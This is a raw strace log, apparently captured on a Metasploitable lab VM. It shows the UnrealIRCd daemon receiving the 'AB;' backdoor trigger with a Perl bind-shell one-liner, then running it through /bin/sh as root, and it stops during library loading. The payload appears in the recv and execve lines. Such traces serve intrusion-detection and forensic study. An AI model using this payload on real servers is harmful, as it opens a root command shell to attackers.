4519  07:19:37.776635 select(1024, [2 3 4 7 9], [], NULL, {0, 850000}) = 1 (in [2], left {0, 690000})

4519  07:19:37.939420 clock_gettime(CLOCK_MONOTONIC, {1587, 756475888}) = 0

4519  07:19:37.939496 accept(2, 0, NULL) = 5

4519  07:19:37.939561 getpeername(5, {sa_family=AF_INET, sin_port=htons(39235), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:19:37.939606 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:19:37.939618 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:19:37.939630 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:19:37.939642 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:19:37.939653 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:19:37.939664 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:19:37.939678 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:19:37.939694 clock_gettime(CLOCK_MONOTONIC, {1587, 756707348}) = 0

4519  07:19:37.939705 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:19:37.939717 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:19:37.939726 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:19:37.939735 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:19:37.939745 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:19:37.939761 send(6, "\213\245\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:19:37.939870 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:19:37.939907 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:19:37.940119 gettimeofday({1495624777, 940144}, NULL) = 0

4519  07:19:37.940153 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:19:37.947688 clock_gettime(CLOCK_MONOTONIC, {1587, 764705396}) = 0

4519  07:19:37.947705 recvfrom(6, "\213\245\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\276\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:19:37.947746 close(6)          = 0

4519  07:19:37.947761 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:19:37.947775 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:19:37.947824 time(NULL)        = 1495624777

4519  07:19:37.947837 time(NULL)        = 1495624777

4519  07:19:37.947848 gettimeofday({1495624777, 947852}, NULL) = 0

4519  07:19:37.947860 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:19:37.947889 clock_gettime(CLOCK_MONOTONIC, {1587, 764901767}) = 0

4519  07:19:37.947899 gettimeofday({1495624777, 947903}, NULL) = 0

4519  07:19:37.947910 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:19:37.947963 clock_gettime(CLOCK_MONOTONIC, {1587, 764976859}) = 0

4519  07:19:37.948003 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:19:37.948048 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:19:37.948068 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:19:37.948080 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:19:37.948095 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7623

7623  07:19:37.948162 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7623  07:19:37.948176 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7623  07:19:37.948187 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7623  07:19:37.948200 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7623  07:19:37.948317 brk(0)            = 0x80f9000

7623  07:19:37.948340 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.948356 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc3000

7623  07:19:37.948372 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.948390 open("/etc/ld.so.cache", O_RDONLY) = 1

7623  07:19:37.948402 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7623  07:19:37.948421 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbb000

7623  07:19:37.948431 close(1)          = 0

7623  07:19:37.948460 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.948521 open("/lib/libncurses.so.5", O_RDONLY) = 1

7623  07:19:37.948535 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7623  07:19:37.948645 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7623  07:19:37.948663 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8b000

7623  07:19:37.948675 mmap2(0xb7fb8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fb8000

7623  07:19:37.948693 close(1)          = 0

7623  07:19:37.948705 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.948718 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7623  07:19:37.948733 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7623  07:19:37.948823 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7623  07:19:37.948842 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f87000

7623  07:19:37.948853 mmap2(0xb7f89000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f89000

7623  07:19:37.948869 close(1)          = 0

7623  07:19:37.948884 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.948898 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7623  07:19:37.948911 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7623  07:19:37.949060 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7623  07:19:37.949078 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f86000

7623  07:19:37.949092 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e37000

7623  07:19:37.949104 mmap2(0xb7f80000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f80000

7623  07:19:37.949119 mmap2(0xb7f83000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f83000

7623  07:19:37.949133 close(1)          = 0

7623  07:19:37.949155 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e36000

7623  07:19:37.949167 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e366b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7623  07:19:37.949225 mprotect(0xb7f80000, 4096, PROT_READ) = 0

7623  07:19:37.949263 munmap(0xb7fbb000, 29913) = 0

7623  07:19:37.949290 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7623  07:19:37.949305 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7623  07:19:37.949324 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd80740) = -1 ENOTTY (Inappropriate ioctl for device)

7623  07:19:37.949355 brk(0)            = 0x80f9000

7623  07:19:37.949365 brk(0x80fa000)    = 0x80fa000

7623  07:19:37.949376 brk(0x80fb000)    = 0x80fb000

7623  07:19:37.949393 getuid32()        = 0

7623  07:19:37.949403 getgid32()        = 0

7623  07:19:37.949412 geteuid32()       = 0

7623  07:19:37.949421 getegid32()       = 0

7623  07:19:37.949448 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7623  07:19:37.949493 time(NULL)        = 1495624777

7623  07:19:37.949506 brk(0x80fc000)    = 0x80fc000

7623  07:19:37.949539 brk(0x80fd000)    = 0x80fd000

7623  07:19:37.949559 open("/proc/meminfo", O_RDONLY) = 1

7623  07:19:37.949583 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7623  07:19:37.949602 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc2000

7623  07:19:37.949613 read(1, "MemTotal:      1035240 kB\nMemFree:        548552 kB\nBuffers:         64896 kB\nCached:         264864 kB\nSwapCached:          0 kB\nActive:         254196 kB\nInactive:       204524 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        548312 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4796 kB\nWriteback:           0 kB\nAnonPages:      128960 kB\nMapped:          51968 kB\nSlab:            16708 kB\nSReclaimable:     8492 kB\nSUnreclaim:       8216 kB\nPageTables:       1952 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7623  07:19:37.949703 close(1)          = 0

7623  07:19:37.949715 munmap(0xb7fc2000, 4096) = 0

7623  07:19:37.949727 brk(0x80fe000)    = 0x80fe000

7623  07:19:37.949754 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7623  07:19:37.949767 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7623  07:19:37.949779 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7623  07:19:37.949791 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7623  07:19:37.949803 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7623  07:19:37.949815 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7623  07:19:37.949828 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7623  07:19:37.949840 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7623  07:19:37.949853 uname({sys="Linux", node="metasploitable", ...}) = 0

7623  07:19:37.949903 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7623  07:19:37.949922 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7623  07:19:37.949990 brk(0x8100000)    = 0x8100000

7623  07:19:37.950004 getcwd("/etc/unreal", 4096) = 12

7623  07:19:37.950020 getpid()          = 7623

7623  07:19:37.950038 getppid()         = 4519

7623  07:19:37.950069 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7623  07:19:37.950089 stat64("/sbin/sh", 0xbfd80718) = -1 ENOENT (No such file or directory)

7623  07:19:37.950102 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7623  07:19:37.950120 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7623  07:19:37.950144 socket(PF_FILE, SOCK_STREAM, 0) = 1

7623  07:19:37.950158 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7623  07:19:37.950170 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7623  07:19:37.950192 close(1)          = 0

7623  07:19:37.950204 socket(PF_FILE, SOCK_STREAM, 0) = 1

7623  07:19:37.950214 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7623  07:19:37.950224 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7623  07:19:37.950242 close(1)          = 0

7623  07:19:37.950255 open("/etc/nsswitch.conf", O_RDONLY) = 1

7623  07:19:37.950269 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7623  07:19:37.950286 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc2000

7623  07:19:37.950297 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7623  07:19:37.950347 read(1, "", 4096) = 0

7623  07:19:37.950357 close(1)          = 0

7623  07:19:37.950366 munmap(0xb7fc2000, 4096) = 0

7623  07:19:37.950382 open("/etc/ld.so.cache", O_RDONLY) = 1

7623  07:19:37.950395 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7623  07:19:37.950411 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbb000

7623  07:19:37.950422 close(1)          = 0

7623  07:19:37.950445 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.950460 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7623  07:19:37.950479 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7623  07:19:37.950572 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7623  07:19:37.950590 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e2d000

7623  07:19:37.950602 mmap2(0xb7e34000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e34000

7623  07:19:37.950620 close(1)          = 0

7623  07:19:37.950632 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.950645 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7623  07:19:37.950659 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7623  07:19:37.950747 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7623  07:19:37.950764 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e15000

7623  07:19:37.950775 mmap2(0xb7e29000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e29000

7623  07:19:37.950791 mmap2(0xb7e2b000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e2b000

7623  07:19:37.950805 close(1)          = 0

7623  07:19:37.950833 munmap(0xb7fbb000, 29913) = 0

7623  07:19:37.950850 open("/etc/ld.so.cache", O_RDONLY) = 1

7623  07:19:37.950863 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7623  07:19:37.950879 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbb000

7623  07:19:37.950889 close(1)          = 0

7623  07:19:37.950899 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7623  07:19:37.950914 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7623  07:19:37.950942 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7623  07:19:37.951105 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7623  07:19:37.951123 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0b000

7623  07:19:37.951135 mmap2(0xb7e13000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e13000

7623  07:19:37.951151 close(1)          = 0

7623  07:19:37.951164 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

